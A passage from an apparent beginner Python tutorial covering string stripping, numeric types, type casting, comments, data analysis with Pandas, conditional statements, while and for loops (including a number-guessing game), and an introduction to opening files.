In line 3, rather than just calling the method, I assigned its result
back to the original variable, which makes the removal of the trailing
whitespace permanent. Here's the new output:
Summer is lovely
Summeris lovely – after the removal of the trailing space
If you think your string has extra space to the left side of the string,
use the lstrip() method. Here’s a small program to test the lstrip()
method:
weather = " cold"
print("It is " + weather)
weather = weather.lstrip()
print("It is " + weather)
Here's the output of the lines (note the extra space in the first one):
It is  cold
It is cold
If you wish to remove whitespaces from both ends, use the strip()
method. Here’s an example to show you the removal of
whitespaces from both ends:
message = " It's so cold in London "
print(message)
message = message.strip()
print(message)
Here's the output of these statements, where (end) marks where each
line stops:
 It's so cold in London (end)
It's so cold in London(end)
If you want to temporarily notice the effects of strip, you can use
the method in a print function and see the effects. These strip
methods are extremely useful in real-life applications when user
data has to be cleaned and manipulated.
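A compact way to compare the three methods side by side is to wrap each result in repr(), a built-in function that shows the quotation marks so the remaining spaces are visible:

```python
text = '  code  '
print(repr(text.lstrip()))   # 'code  '   -- left spaces removed
print(repr(text.rstrip()))   # '  code'   -- right spaces removed
print(repr(text.strip()))    # 'code'     -- both ends cleaned
print(repr(text))            # '  code  ' -- the original is unchanged
```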
Numbers
Numbers are an integral part of our daily lives, and computers make
heavy use of the two binary digits, 0 and 1. Python has several
different ways to treat numbers. Here are a few common types
we'll be looking at:
Integers
Integers are numbers that are written without fractional parts. In
Python, these numbers have the type int (just like bool for
Booleans).
Here are a few integers and their declaration in Python:

a = 2424
b = 10101
c = 9040
Floats
If you declare a number with a decimal point, Python will
automatically consider it a floating-point number or a float.
All operations you could perform on integers can also be
performed on floating-point numbers. If you run the type function
on floats, you'll get the type 'float'.
Here’s a program to show some operations on floats:
w = 1.2 * 0.3
print(w)
x = 10.4 + 1.6
print(x)
y = 10.555 + 22.224
print(y)
z = 0.004 + 0.006
print(z)
Here is the output to all four print statements:
0.36
12.0
32.778999999999996
0.01
Type Casting: What Is It?
Another fact about Python is that it is a dynamically-typed
language.
A dynamically-typed language doesn't associate a
data type with your variable at the time you are typing your code.
Rather, the type is associated with the value at run-time. Not
clear? Let's see an example.
x = 10
x = "I am just a phrase"
x = 10.444
x = True
When you run this code, it’ll perform its desired actions correctly.
Let’s see what happens with the variable ‘x’ though. We’ve written
four statements and assigned different values to ‘x’.
On run-time (when you interpret or run your program), on line 1,
‘x’ is an integer. On line 2, it’s a string. On line 3, it’s a float, and
finally, it’s a Boolean value.
However, through typecasting, we can manually change the types
of each variable. The functions we’ll be using for that purpose are
str(), int(), and float().
Let’s expand the same example:
x = 10
x = float(x)
print(type(x))
x = "I am just a phrase"
print("x: " + x)
print(type(x))
x = 10.444
x = int(x)
print(type(x))
x = False
x = int(x)
print(x)
In this program, we’ve used everything covered in the last few
lessons. All data types and converted them using our newly learned
function.
In the first case, x is converted into a float, and the type function
verifies that for us. Secondly, the string stays a string; a phrase
like this cannot be converted into an int or a float. Thirdly, we
convert the float into an integer.
As an added exercise, if you print the newly changed value of the
third case, you’ll see that the value of x is: 10. This is because the
type is now changed and the values after the decimal point are
discarded.
In the fourth case, we assign False to x and then convert it to an
integer before printing. Here, something else comes up. The
output? 0.
It's because, in Python, True converts to the integer 1 and False
converts to 0 (and any non-zero number counts as true in a Boolean
context). So, their integer conversions yield 1 and 0 for True and
False respectively.
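The str() function mentioned above goes the other way, turning numbers into strings, which is handy when concatenating them into messages (a small sketch):

```python
age = 30
# Concatenating a number directly onto a string would raise a TypeError,
# so we cast it to a string first.
sentence = 'I am ' + str(age) + ' years old'
print(sentence)           # I am 30 years old
print(type(str(age)))     # <class 'str'>
```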
Comments
Comments are text phrases that are put in the code to make it
understandable and readable for other coders, readers, and
programmers.
Why Are Comments Important?
Comments are very important, especially when you’re working
with other programmers and they’ll be reviewing your code sooner
or later. Through comments, you can write a small description of
the code and tell them what it does.
Also, if you have other details or personal messages which are
relevant to the code, you can put them there, since the interpreter
doesn’t catch them.
How to Write Comments?
In python, there are two ways to write comments, and we’ll be
exploring both of them. For our first method, you can use the “#”
symbol in front of the line you wish to comment. Here, take a look
at this code:
# This line is a comment
# Count is a simple variable
count = 15
print(count)
If you run this code, the output will be 15. This is because the
comments lines (starting with #) are not run at all.
Now, this method is fine if your commented lines are few, i.e., they
do not span multiple lines. But if they do, hashing all of them is
a waste of time. For our second method, we'll open our
commented lines with three single quotation marks (''') and close
them with three quotation marks as well. Here's an example:

1. '''
2. This comment spans
3. on multiple lines.
4. '''
5. count = 15
6. print(count)
Notice, we have to close our multi-line comment, unlike the single
line comment.
Data Analysis with Python

Another topic that we need to explore a bit here is how Python, and
some of the libraries that come with it, can support the process
of data analysis. This is an important process for any business
because it allows them to take all of the data and information they
have been collecting for a long time and put it to good use
once they understand what it says. It can be hard for a person to go
through all of this information manually, but for a data analyst who
is able to use Python to complete the process, it is much easier to
find the information and the trends that you need.

The first thing that we need to look at here, though, is what data
analysis is all about. Data analysis is the process that
companies use to extract useful, relevant, and even
meaningful information from the data they collect, in a manner that
is systematic. This ensures that they are able to get the full
value out of everything and see some great results in the
process. There are a number of reasons that a company would
choose to work on its own data analysis, and these can include:

1. Parameter estimation, which helps them infer some
of the unknowns that they are dealing with.
2. Model development and prediction, which brings
a lot of forecasting into the mix.
3. Feature extraction, which means identifying
some of the patterns that are there.
4. Hypothesis testing, which allows us to verify
the information and trends that we have found.
5. Fault detection, which is the monitoring of
the process that you are working on to make sure that
no biases creep into the information.

One thing that we need to make sure that we are watching out for is
the idea of bias in the information that we have. If you go into the
data analysis with the idea that something should turn out a certain
way, or that you are going to manipulate the data so it fits the ideas
that you have, there are going to be some problems. You can
always change the data to say what you would like, but this doesn’t
mean that you are getting the true trends that come with this
information, and you may be missing out on some of the things that
you actually need to know about.
This is why a lot of data analysts will start this without any kind of
hypothesis at all. This allows them to see the actual trends that
come with this, and then see where the information is going to take
you, without any kind of slant with the information that you have.
This can make life easier and ensures that you are actually able to
see what is truly in the information, rather than what you would
like to see in that information.

Now, there are going to be a few different types of data that you
can work with. First, there is deterministic data, also known as
non-random data. And then there is stochastic data, which is pretty
much any kind that does not fit into the deterministic category.

1. The Data Life Cycle

As we go through this information, it is important to understand
some of the different phases that come with the data life cycle.
Each of these comes together to ensure that we are able to
understand the information that is presented to us and that we are
able to use all of the data in the most efficient and best way
possible.

There are a few stages that are going to come with this data life
cycle, and we are going to start out with some of the basics to
discuss each one to help us see what we are able to do with the data
available to us. First, we work with data capture. The first
experience that an individual or a company should have with a data
item is to have it pass through the firewalls of the enterprise. This
is going to be known as the Data Capture, which is basically going
to be the act of creating values of data that do not exist yet and
have never actually existed in that enterprise either. There are three
ways that you can capture the data including:

1. Data acquisition: This is going to be the ingestion of


data that is already existing that was produced by the
organization but outside of the chosen enterprise.
2. Data entry: This is when we are dealing with the
creation of new data values to help with the enterprise
and it is done by devices or human operators that can
help to generate the data needed.
3. Signal reception: This is where we are going to capture
the data that a device has created with us, typically in
the control system, but can be found in the Internet of
Things if we would like.

The next part is going to be known as Data Maintenance. This is
where you supply the data to the points at which data
synthesis and data usage can occur in the next few steps. And it is
best if you are able to work out those points so that they are going
to be ready to go in this phase.

What we will see during data maintenance is that we are
working to process the data without really deriving any
value out of it yet. This is going to include integrating changed
data, cleansing, and making sure that the data is in the right format
and as complete as possible before we get started. This ensures that
no matter what method or algorithm you choose to work with here,
you are going to be able to have the data ready to go.

Once you have been able to maintain the data and get it all cleaned
up, it is time to work on the part known as data synthesis. This is a
newer phase in the cycle and there are some places where you may
not see this happen. This is going to be where we create some of
the values of data through inductive logic, and using some of the
data that we have from somewhere else as the input. The data
synthesis is going to be the arena of analytics that is going to use
modeling of some kind to help you get the right results in the end.

Data usage comes next. This data usage is going to be the part of
the process where we are going to apply the data as information to
tasks that the enterprise needs to run and then handle the
management on its own. This would be a task that normally falls
outside of your life cycle for the data. However, data is becoming
such a central part of the model for most businesses and having this
part done can make a big difference.

For example, the data itself can be a service or a product, or at
least part of a service or product. This would then make it a part of
the data usage as well. The usage of the data is going to have some
special challenges when it comes to data governance. One of these
is whether it is legal to use the data in the ways that most people in
business would like. There could be some issues like contractual or
regulatory constraints on how we can use this data and it is
important that these are maintained as much as possible.

Once we have figured out the data usage, it is time to move on to
data publication, which implies that the data has been sent outside of
the firm or enterprise.
Next on the list is the data archival. We will see that the single data
value that we are working with can sometimes experience a lot of
different rounds of usage and then publication, but eventually, it is
going to reach the very end of its life. The first part of this means
that we need to be able to take the value of the data and archive it.
When we work on the process of Data Archival, it is going to mean
that we are copying the data to an environment where it is stored in
case we need it again, in an active production environment, and
then we will remove the data from all of those active environments
as well.

This kind of archive for the data is simply going to be a place
where the data is stored, but where no publication, usage, or
maintenance is going to happen. If necessary, it is possible to take
any of the data that is in the archive and bring it back out to use
again.

And finally, we reach data purging. This is the end that comes for our single data value and the life cycle it has gone through. Data purging means removing every copy of the data from the enterprise; where possible, this is done from the archive. If Data Governance raises a challenge at this point, it is usually to prove that the data went through the proper purging procedure.

2. Working with data analysis and why it is important

With this in mind, why would we want to work on data analysis in the first place? Do we really need to look through all of this information to find the trends, or is there another method? Let’s look at an example of what can happen when we do data analysis and why you would want to use it.

Let’s consider that we are looking at a set of data that includes information about the weather across the globe between the years 2015 and 2018, broken down by country. Among other things, there is a percentage of rain recorded for each country during those years.

Now, what if you would like to go through all of that data, but only look at the figures for one specific country? Let’s say that you would like to look at America, and you want to see what percentage of rain it received between 2016 and 2017. How are you going to get this information in a quick and efficient manner?
To get ahold of this particular slice of the data, we work with data analysis. There are several algorithms, especially from machine learning, that can help you figure out the percentage of rain that America got between 2016 and 2017. This whole process is what data analysis is really all about.
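To make this concrete, here is a minimal sketch in plain Python. The countries, years, and rainfall percentages below are invented purely for illustration; they are not real measurements.

```python
# Hypothetical weather records: country, year, and rainfall percentage.
# Every number here is made up for the sake of the example.
records = [
    {"country": "America", "year": 2015, "rain_pct": 35},
    {"country": "America", "year": 2016, "rain_pct": 38},
    {"country": "America", "year": 2017, "rain_pct": 41},
    {"country": "France",  "year": 2016, "rain_pct": 45},
]

# Keep only America's rows for the years 2016 and 2017.
subset = [r for r in records
          if r["country"] == "America" and 2016 <= r["year"] <= 2017]

for r in subset:
    print(r["year"], r["rain_pct"])
```

Libraries built for data analysis wrap this kind of filtering in far more powerful and convenient tools, as we are about to see.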

3. The Python Pandas Library

When it comes to doing data analysis in Python, the best extension that you can use is Pandas. This is an open-source library that works well with Python, providing high performance, data structures that are easy even for a beginner to use, and tools that make data analysis with Python easy. There is a lot to enjoy about this library, and if you want to be able to sort through all of the great information that you have available with the help of Python, then this is the library to work with.

There is a lot to like about working with the Pandas library. First off, it is one of the most popular and easiest to use libraries for data science, and it works on top of the NumPy library. One thing that a lot of coders like about Pandas is that it can take data from many sources, including a SQL database or a TSV or CSV file, and use it to create a Python object with rows and columns called a data frame, something that looks very similar to a table in statistical software such as Excel.
There are many different features that are going to set Pandas apart
from some of the other libraries that are out there. Some of the
benefits that you are going to enjoy the most will include:

1. There are data frames, or data structures, that are higher level than some of the other options you can use.
2. There is a streamlined process in place to handle tabular data, along with rich functionality for the time series that you want to work with.
3. There is the benefit of data alignment, missing-data-friendly statistics, and merge, join, and groupby methods to help you handle the data that you have.
4. You are able to use the variety of data structures in Pandas, and you can freely draw on the functions present in SciPy and NumPy to make sure manipulation and other work can be done the way that you want.
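As a small illustration of the groupby and missing-data points above, here is a hedged sketch using a tiny, invented data frame; the column names and values are made up for the demo. Note how mean() simply skips the missing value.

```python
import pandas as pd

# A tiny, invented data frame for demonstration purposes only.
df = pd.DataFrame({
    "country": ["America", "America", "France", "France"],
    "year": [2016, 2017, 2016, 2017],
    "rain_pct": [38.0, None, 45.0, 47.0],  # one value missing on purpose
})

# Missing-data-friendly statistics: mean() ignores the None by default.
avg = df.groupby("country")["rain_pct"].mean()
print(avg)
```

This is the kind of one-line summary that would take a surprising amount of bookkeeping to write by hand.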

Before we move on from here, we also need to have a good look at which types of data are best suited to Pandas. Pandas copes well with large amounts of data and will be able to help you sort through almost any kind of data that you would like. Some of the data types that are the most suitable for working with the Pandas library in Python include:

1. Any kind of tabular data with heterogeneously typed columns.
2. Arbitrary matrix data that has labels for the columns
and rows.
3. Unordered and ordered time-series data
4. Any other kinds of sets of data that are statistical and
observational.

Working with the Pandas library is one of the best ways to handle the Python coding that you want to do for data analysis. As a company, it is so important not only to collect data, but also to be able to read through that information and learn the trends that are hiding there. Being able to do this can provide your company with the insights it needs to do better and really grow, while providing good customer service.

There are a lot of different methods that you can use to perform data analysis, and some of them work differently from Python or the Pandas library. But when it comes to efficiently and quickly working through a lot of data, with a multitude of algorithms that can sort through all of this information, Python with Pandas is the best option.
Conditional Statements
If Statements
More often than not, you’re faced with a situation where you have
to decide something and then, a few things happen in response to
your decision.
Similarly, programming languages also allow you to write
conditional tests, with which, you can check a condition and make
responses according to it. Let’s take a real-life example, and then
code it. If the stove is on, then close it. If it is not on, then do
nothing.
If you take a look, we use the keyword ‘if’ when we’re trying to
put forth a condition. If this, then that. Likewise, Python uses the if
statement to allow you to make a decision based on something.
That ‘something’ in our example was, whether or not the stove was
on. Let’s code it.

1. # Whether or not the stove is on.
2. stoveOn = True
3. # Is the stove on?
4. if stoveOn == True:
5.     print("The stove is on! Close it.")
Firstly, we declared our variable and said, yes, the stove is on. Now, using the if statement, we check whether the value of our variable, compared to the Boolean value True, yields a True, i.e. the stove is actually on and both values are the same.
Now to the syntactical part. Using an if statement is simple. You can either write your condition directly after the if keyword, or you can wrap it in a pair of parentheses, like this:
if(stoveOn == True):
You can put in as many conditions as you want and use logical operators (and, or) to combine them, making a decision based on their values. After the condition, we use the “:” symbol to continue. Next, we tell the program what it should do if the result of our conditional test is True. If not, it will completely ignore the code which follows this test. But is it only the first following line that is ignored? Let’s see.
Since in our case, it is True, we simply print a statement to close it
right away. But, here’s something odd. Do you see an indentation
on the next line?
This indentation is how we recognize the part of the code which
follows our if statement. In this case, there’s only one statement.
But, here’s an example with multiple lines of code and quite a few
conditions to test:

1. # Whether or not the stove is on.
2. stoveOn = True
3. lightsOn = False
4. # Is the light on? Just check the stove.
5. if(lightsOn == True):
6.     if(stoveOn == True):
7.         print("The lights are on, just close the stove.")
8. # Is the light off? Open it, then, check the stove.
9. if(lightsOn == False):
10.     print("First, open the lights!")
11.     if(stoveOn == True):
12.         print("Close the stove!")
Now, we test a few conditions and then make our decision. We added another variable which helps us make that decision.
Firstly, we check if the lights are on. The code on line 6 is indented, which means it is executed only if the statement on line 5 is True. If not, all that indented code is neglected. If line 5 yields a True but line 6 returns a False, notice that the code on line 7 is indented once more: it is part of the if statement on line 6 and will not be executed in that case.
Now, on to the second conditional test. If the lights aren’t on, we print a statement to turn the lights on, then check the stove. See how the code on lines 10-12 is indented once: it belongs to the if statement on line 9 and will be executed by the interpreter only if that statement yields a True. Similarly, the code on line 12 only executes if the if statement on line 11 is True.
So, the indentation in Python is important and must be well
taken care of. If you don’t indent your code properly, either
your conditions won’t output a result, or, you will get an error.
‘If-else’ Statements
Now, what was our example again? Here’s that sentence: if the stove is on, then close it. If it is not on, then do nothing.
You see, we catered for the part where it says, if the stove is on, do this and that. But what about the part where it isn’t on? Let’s take a look at this code, which expands on our first example.

1. # Whether or not the stove is on.
2. stoveOn = False
3.
4. # Is the stove on?
5. if stoveOn == True:
6.     print("The stove is on! Close it.")
7. else:
8.     print("The stove is off!")
Now, we put a False in our variable and continued our tests. If the stove is on (a True output from the if condition), we just print that it is on. If it is not, we use the else clause to say: do this instead.
Like our real-life situations: do this, else do that. So, what happens here? When the result of the if statement on line 5 is False, the program neglects all the indented code (which would have run if that statement were True) and executes the else clause.
Now, logically, it states: if stoveOn is False, do this. And we simply print that the stove is already off!

‘if-elif-else’ Statements
Usually, when asked to write multiple conditions, you might write them in a similar fashion: if this, then do this. Else, if this, then do that. Else (none of these), do something completely different.
See how all these if-elif-else clauses are linked to one single conditional statement? This is where the elif, or Else If, block comes in. If the variable you wish to use for your conditional test has many values, and needs a different output for each of them, you can put the tests in an if-elif-else block. This way, only one branch runs: the first condition that comes out true is executed, and every later elif, along with the else clause, is skipped; if none of the conditions is true, the else clause runs.
We did just the same. We said, if the lights and stove are on, you just close the stove. Else if (elif in Python) the lights are off but the stove is on, turn the lights on and close the stove. And further, we continue with the else statement.

1. # Whether or not the stove is on.
2. stoveOn = True
3. lightsOn = False
4. # Is the light on? Just check the stove.
5. if(lightsOn == True and stoveOn == True):
6.     print("The lights are on, just close the stove.")
7. elif (lightsOn == False and stoveOn == True):
8.     print("Turn the lights on, close the stove!")
9. else:
10.     print("The stove is already off.")

The example also shows how you can run multiple conditions in an
if-elif-else statement and base the output on all those.
Loops – The Never-Ending Cycle
Imagine you are creating a program which asks the user to guess a number. The code should run three times before it lets the user know that they have used up their three chances and failed. Similarly, the program should be smart enough to know if the user guessed the right number, in which case it would end the execution of the program by displaying “You guessed the right number!”
We use loops to address such situations. A loop is when an entire block of code continues to run over and over again until the condition set is no longer valid. If you forget to set a condition, or if a condition is not properly defined, you may start an endless loop that will never cease, leaving the program seemingly stuck.
Do not worry, your system will not crash. You can end the program
by using the red/pink stop button that always magically appears
after you hit the green run button.
There are essentially two types of loops we use in Python. The first
one is the ‘while’ loop, and the second one is the ‘for’ loop.
The ‘While’ Loop
This type of loop runs a specific block of code for as long as the
given condition remains true. Once the given condition is no longer
valid, or turns to false, the block of code will end right away.
This is quite a useful feature as there may be codes which you may
need to rely on to process information quickly. To give you an
idea, suppose, you are to guess a number. You have three tries.
You want the prompt to ask the user to guess the number. Once the
user guesses the wrong number, it will reduce the maximum
number of tries from three to two, inform the user that the number
is wrong and then ask to guess another time. This will continue
until either the user guesses the right number or the set number of
guesses are utilized and the user fails to identify the number.
Imagine just how many times you would have to write the code
over and over again. Now, thanks to Python, we just type it once
underneath the ‘while’ loop and the rest is done for us.
Here’s what the syntax for the ‘while’ loop looks like:
while condition:
    code
    code

You begin by typing in the word ‘while’ followed by the condition.
We then add a colon, just like we did for the ‘if’ statement. This means that whatever follows next will be indented, to show that it belongs underneath the loop or the statement.
Let us create a simple example from this. We start by creating a
variable. Let’s give this variable a name and a value like so:
x=0
Nothing fun here, so let us add something to make it more exciting.
Now, we will create a condition for a while loop. The condition
would state that as long as x is equal to or less than 10, the prompt
will continue to print the value of x. Here’s how you would do that:
x = 0
while x <= 10:
    print(x)
Now try and run that to see what happens!
Your console is now bombarded with a never-ending loop of zeros.
Why did that happen? If you look close enough at the code, we
only assigned one value to our variable. There is no code to change
the value or increase it by one or two, or any of that.
In order to create a variable whose value continues to change after it has printed the initial value, we need to add one more line to the code. Call it the increment code, where x will increase by
one after printing out a value. The loop will then restart, this time
with a higher value, print that and then add one more. The loop will
continue until x is equal to 10. The second it hits the value of 11,
the interpreter will know that the condition no longer remains true
or valid, and hence we will jump out of the loop.
x = 0
while x <= 10:
    print(x)
    x = x + 1
The last line executes, recalls the current value of x, and then adds one to it. The result would look like this:
0
1
2
3
4
5
6
7
8
9
10
If you do not like things to add just like that, add a little print
statement to say “The End” and that should do the trick.
I almost forgot! If you intend to add a print statement at the end,
make sure you hit the backspace key to delete the indentation first.
Let’s make things a little more fun now, and to do that, we will be
creating our very first basic game.
Let me paint the scenario first. If you like, pick up a pen and a
paper, or just open notepad on your computer. Try and write down
what you think is the possible solution for this.
The game has a secret number that the end-user cannot see. Let’s
assume that the number is set to 19. We will allow the user to have
three attempts to guess the number correctly. The game completes
in a few possible ways:

1. The user guesses the number correctly before running


out of lives.
2. The user runs out of the three chances and is unable to
guess the number.
3. The user guesses the number on the final attempt.
Use your imagination and think what can be the possible code.
Once ready, let us proceed to the actual coding for this game and
see how this works out to be.
Hint: Use both a ‘while’ loop and an ‘if’ statement!
Well done for those who tried. There is no shame in failing to pull
this off. I failed to do the same myself until I saw the solution and I
practically kicked myself!
my_number = 19
guess = 0
max_guess = 3
while guess < max_guess:
    number = int(input("Guess the number: "))
    guess += 1
    if number == my_number:
        print("Wow! Look at you, genius!")
        break
    else:
        print("Nope! Not in a million years! Try again!")
else:
    print("You ran out of chances")
“Wait! Why did you use an ‘else’ with the ‘while’ loop? I didn’t
know if you can do that!”
Now you do! The ‘else’ is not just limited to ‘if’ statements, you
can use it with while as well.
Here’s what the end result looks like:
All incorrect guesses
Guess the number: 1
Nope! Not in a million years! Try again!
Guess the number: 2
Nope! Not in a million years! Try again!
Guess the number: 3
Nope! Not in a million years! Try again!
You ran out of chances
Correct guess
Guess the number: 17
Nope! Not in a million years! Try again!
Guess the number: 18
Nope! Not in a million years! Try again!
Guess the number: 19
Wow! Look at you, genius!
Remember nested conditional statements? This is exactly that. The
program begins by first understanding certain variables. See how I
have named them to make it a little easier to read.
We gave ‘guess’ a value of zero to begin with. That is exactly what
you need to do as the first attempt has not yet been registered by
the system. Always begin such guesses/attempts from zero and
then add increments. We then followed by setting an upper limit.
We could have just written the same condition in this way:
while guess < 3:
The problem with this would have been that the digit ‘3’ was only recognizable by us. For any other programmer, this would not make any sense. Therefore, we replaced it with a variable so that it literally improves readability. Now, it reads like this:
“While guess is less than max_guess:”
This is how you should always aim your code to be. It should be readable and easy to understand by everyone.
“<” is yet another comparison operator. Here, the condition holds as long as the value on the left is less than the value on the right.
We started by asking the user to guess, and that is what we take as input. However, since it will be a whole number, we also converted the input into an integer. After the user guesses the number, whether right or wrong, we immediately need the program to add 1 to the number of guesses. This is where we used an increment. But, unlike what we did earlier, I changed things a little and used the ‘+=’ operator. It basically means: increase the value by whatever number you write on the other side. If you are more comfortable using the previous method, that would work flawlessly as well.
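The two increment styles really are interchangeable; here is a quick sketch:

```python
guess = 0
guess = guess + 1   # the longer form we used before
guess += 1          # the shorthand form; adds 1 to guess
print(guess)        # 2
```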
Now, here’s the twist. We used an ‘if’ statement to let the program know that if the user guesses the exact number, it should print out a message that is appropriate for the occasion. Otherwise, the ‘else’ branch of the ‘if’ statement runs and asks the user to try again.
Should the final guess be wrong, the count of guesses will increase, the while condition will no longer be true, and the ‘else’ part of the loop will come into play and end the game.
The thing to notice here is the ‘break’ statement that I used within the code. Go ahead and see what happens when you remove it. If you guess your numbers wrong, the code will work fine. But if you end up inputting the right value, instead of ending the game, it will still go on until the third attempt is made.
To avoid that from happening, we use the ‘break’ statement to jump out of the loop as soon as the condition above it is met.
Now, there is almost nothing left about the ‘while’ loop, let us
move to the ‘for’ loops. Slightly different to what you might
expect, but interesting nonetheless.
The ‘For’ Loop
The ‘while’ loop executes whatever code block is written within it multiple times, until the condition is no longer met or valid. The ‘for’ loop is designed to “iterate over items of collections” and, right away, that can cause some confusion.
Do not be intimidated by fancy words or technical language; once you see the loop in action, it will automatically start making sense. To give it a little clearer meaning, let us look at the example below:
for char in "Loops":
    print(char)
To create a ‘for’ loop, we begin by using the for keyword. The word ‘char’ is just a variable we created. Notice how we did not define this variable before. Whenever we use ‘for’ loops, we create what are called loop variables. These exist only within the loop itself, to carry out the loop and its operations. Here, I used ‘char’ to represent ‘characters’, since the loop walks over the string one character at a time.
What this means is “for every character in the word ‘Loops’”, print
out the characters. Surely enough, if you execute this code, you
will end up with this:
L
o
o
p
s
The system iterates over each of the components and then uses
those according to what the program says. Here, we only asked it to
print characters. It started with ‘L’ and then moved on to ‘o’ and
continued until there were no characters left.
It isn’t necessary to use a string; you can also use what are termed lists. These are collections of values, either strings or numbers, stored within a list. Lists are represented by square brackets ‘[]’ and can hold as many items as you like.
Let’s try that and see what happens:
for char in ["I", "Love", "Programming"]:
    print(char)
Output:
I
Love
Programming
See how that differed? That is because when we used a single string, every character was a separate item. Here, the list holds multiple items, so instead of printing individual characters, the loop printed out the whole value stored in each component of the list.
Here’s one more example, and this one has a new function for us to dive into. Suppose you wish to print out the numbers up to 20. Instead of typing all the numbers ourselves, we use a built-in function called range():
for number in range(20):
    print(number)
Here, we pass the higher end of the range as a parameter. Now,
Python will execute this for us and the results will be exactly how
you might imagine:
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
See how it printed the numbers to 19 and not 20? That is because
for Python, the first position is always considered as zero. If you
scroll up, you will see that the count started from zero. For now, do
not get bogged down there. We will discuss that when we discuss
about index numbers.
If you wish to set a specific starting point, you can do so by adding
a value, followed by a comma, just before the 20:
for number in range(10, 20):
Now the count will begin from 10 and end at 19. Let’s take that up a notch. Suppose I want to print out numbers from 10 to 20, and I want 20 to be printed, but I do not want all the numbers. I want the program to print out every second number, like 12, 14, 16 and so on. You can actually do that, because the range function accepts a third argument, termed the ‘step’.
for number in range(10, 21, 2):
    print(number)
Output:
10
12
14
16
18
20
Now, the program executes, starts with the first number and knows
that it needs to jump two steps and print that number. This will
carry on until the final number, or the last possible number of
iteration, is printed. Notice, in order to print 20, I had to change the
value to 21 within the range.
E-commerce and e-shops use these quite a lot to iterate over the
cart items and deliver you a total price of your potential purchase.
In case you wish to see how that happens, here’s one more example
for a ‘for’ loop.
Scenario: I have five items in my imaginary cart. They are $5, $10,
$15, $20, and $25 in prices, respectively. I want the program to let
me know what my total is. While I can use the calculator myself, or
pause for a few seconds and calculate the price myself, I want a
quicker solution. You, as a programmer, will need to create
something like this:
prices = [5, 10, 15, 20, 25]
total = 0
for item in prices:
    total += item
print(f"Your total price is: ${total}")
Output:
Your total price is: $75
Let’s be honest. This was much more fun to do than using a simple
calculator, wasn’t it? Programming can be tough at times,
frustrating too. Sometimes, you might arrive at a point where you
would spend the rest of your day, wondering what could possibly
be causing you to have such a nightmarish time with a program that
seemed too simple to execute.
Relax! Every one of us faces that. It comes with the kind of work
we do. Programming can be quite deceptive and will take quite a
lot of time for you to master. What’s important is that you never
give up. Should you feel frustrated, grab a drink, have some fresh
air, and calm your mind. The solution would be more obvious than
you might think.
Now that we have calmed down a little, let’s get back to learning Python. It is time to put an end to the loops by learning one more type of loop, called the ‘nested’ loop. If you recall, we have already seen a nested conditional statement: an ‘if’ statement within an ‘if’ statement. Similarly, we can use a ‘for’ loop within a ‘for’ loop to get the things that we wish to acquire.
The ‘Nested’ Loop
Let us start this one off by trying to print some values for ‘a’, ‘b’, and ‘c’. We wish to have values from zero to two for each one, in somewhat a similar fashion to how we write coordinates:
(a, b, c)
(0, 0, 0)
(0, 0, 1)
And so it goes on until ‘c’ is two, after which the next counter to its left ticks over and ‘c’ starts again. That would be quite a lot of work if we were to write these on our own. Fortunately, we have Python to help us out, using nested loops. How? Let’s take a look.
for a in range(3):
    for b in range(3):
        for c in range(3):
            print(f"({a}, {b}, {c})")
Wow! Look at that! A ‘for’ loop within a ‘for’ loop within another ‘for’ loop. That is a lot of loops right there. But that is exactly how this will work. The program starts with all three loop variables at zero. Then the innermost loop runs again; this time, only ‘c’ jumps to a value of one while the others remain the same. This continues until ‘c’ reaches the end of its range, after which ‘b’ gains a value of one and ‘c’ starts over. Hopefully, you see how this is going. The result is as under:
(0, 0, 0)
(0, 0, 1)
(0, 0, 2)
(0, 1, 0)
(0, 1, 1)
(0, 1, 2)
(0, 2, 0)
(0, 2, 1)
(0, 2, 2)
(1, 0, 0)
(1, 0, 1)
(1, 0, 2)
(1, 1, 0)
(1, 1, 1)
(1, 1, 2)
(1, 2, 0)
(1, 2, 1)
(1, 2, 2)
(2, 0, 0)
(2, 0, 1)
(2, 0, 2)
(2, 1, 0)
(2, 1, 1)
(2, 1, 2)
(2, 2, 0)
(2, 2, 1)
(2, 2, 2)
Phew! That would have taken us quite some time to write. However, with some clever trickery of nested loops and just a few keystrokes, we have it right how we want it. That is how effective nested loops are. When you have to deal with big chunks of data, you will want to rely quite a bit on nested loops. They get the job done and are mighty effective too.
Now, since that is out of the way, let us focus on operators. Those pesky little signs that keep on changing every now and then, remember? We will be looking into these to see how they work for us.
File handling
The Python programming language allows us to work on two different levels when we refer to file systems and directories. One of them is through the os module, which lets us work with the whole system of files and directories at the level of the operating system itself.
The second level is the one that allows us to work with files themselves, by manipulating their reading and writing at the application level and treating each file as an object.
In Python, as in any other language, files are manipulated in three steps: first they are opened, then they are operated on or edited, and finally they are closed.
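As a minimal sketch of those three steps (the file name example.txt is just an assumption for this demo):

```python
# 1. Open (here in write mode, which creates the file if needed).
f = open("example.txt", "w")
# 2. Operate: write some content into the file.
f.write("Hello, file!")
# 3. Close, so the content is flushed to disk.
f.close()

# The same three steps again, this time reading the file back.
f = open("example.txt")          # read-only by default
content = f.read()
f.close()
print(content)                   # Hello, file!
```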
What is a file?
A Python file is a set of bytes arranged in a structure. In the header we find the data about the file, such as its name, size and the type of file we are working with; the data forms the body of the file, holding the content written in the editor; and the end of file is the sentence through which we notify the code that we have reached the end of the file. In this way, we can describe the structure of a file.
The structure of the files is composed in the following way:
- File header: The data about the file (name, size, type)
- File Data: This will be the body of the file and will have
some content written by the programmer.
- End of file: This sentence is the one that will indicate that
the file has reached its end.
How can I access a file?
There are two very basic ways to access a file: one is to use it as a text file, where you proceed line by line; the other is to treat it as a binary file, where you proceed byte by byte.
Now, to assign a file object to a variable, we need to use the open() function, which allows us to open a file.
Open() function
To open a file in Python, we have to use the open() function, which receives as parameters the name of the file and the mode in which the file will be opened. If the opening mode is not given, the file opens in the default mode, read-only.
We must keep in mind that the operations on an open file are limited by its mode: it is not possible to read a file that was opened only for writing, and you cannot write to a file which has been opened only for reading.
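A quick sketch of that restriction (demo.txt is an assumed throwaway name): writing to a file opened read-only raises an error.

```python
import io

# Create a small file first, so we have something to open read-only.
with open("demo.txt", "w") as f:
    f.write("some text")

f = open("demo.txt", "r")        # opened for reading only
try:
    f.write("more text")         # not allowed in 'r' mode
    write_refused = False
except io.UnsupportedOperation:  # Python refuses the write
    write_refused = True
f.close()
print("Write refused:", write_refused)   # Write refused: True
```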
The open() function takes two main parameters:
- file: the path to the file we want to open.
- mode: the mode in which we open it.
Its syntax is open(file, mode). Of these parameters:
File: This argument provides the name of the file we want to access with the open() function; it is the path of our file.
